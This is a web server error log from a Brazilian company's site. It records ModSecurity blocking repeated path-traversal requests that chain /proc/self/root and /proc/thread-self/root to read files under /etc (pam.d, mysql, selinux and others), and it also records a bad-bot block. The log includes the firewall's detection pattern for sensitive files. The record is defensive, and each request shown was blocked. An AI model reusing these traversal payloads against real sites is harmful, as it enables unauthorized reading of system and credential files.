[Wed Mar 18 11:02:16.211363 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:57732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwaMdf6f5d65gmYZTYtAAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:02:31.071050 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:43300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwdwkwaGbbGflqUZATkQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:02:46.523824 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:47484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwhimAPhZkrhU8w4lwtAAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:02:59.128868 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:47484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwkimAPhZkrhU8w4lwwAAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:03:02.616055 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:56214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwlta6ubjKNq_cu4ad1AAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:03:39.543049 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.228.61:52726] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqwuuw_le52K8_3pV3jVwAAAgg"]
[Wed Mar 18 11:03:46.730750 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.244.43:49654] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqwwuoXxyEfFpUF8f9xEwAAAUc"]
[Wed Mar 18 11:03:52.592491 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:56218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwyNa6ubjKNq_cu4aeGAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:03:54.678119 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:40828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwyUzinOy1jxa1j4cYqgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:03:58.141956 2026] [mime_magic:error] [pid 15051:tid 140411641214720] (70014)End of file found: [client 74.7.243.128:40840] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/spool/postfix
[Wed Mar 18 11:04:02.646469 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:52356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw0vu8EFLIOrSqIpsHSAAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 11:04:04.161897 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:40848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw1CmAPhZkrhU8w4lw9AAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:04:05.639070 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:56574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw1ew_le52K8_3pV3jYQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:04:07.130569 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:56578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw1wkwaGbbGflqUZATvwAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:04:12.859753 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:58888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw3OyqAr6etmhZHNrEKAAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:04:14.546422 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:56586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw3fu8EFLIOrSqIpsHUAAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:04:17.551153 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:41838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw4da6ubjKNq_cu4aeLAAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:04:18.929995 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:41854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw4vu8EFLIOrSqIpsHUQAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:04:20.655671 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:54850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw5Na6ubjKNq_cu4aeLwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:04:27.405865 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:39958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqw6-yqAr6etmhZHNrENwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:06:06.306534 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:59720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxTMdf6f5d65gmYZTZbQAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:06:14.955931 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:52256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxVQkwaGbbGflqUZAUEQAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:07:17.180386 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.241.31:52264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxlUzinOy1jxa1j4cZgwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
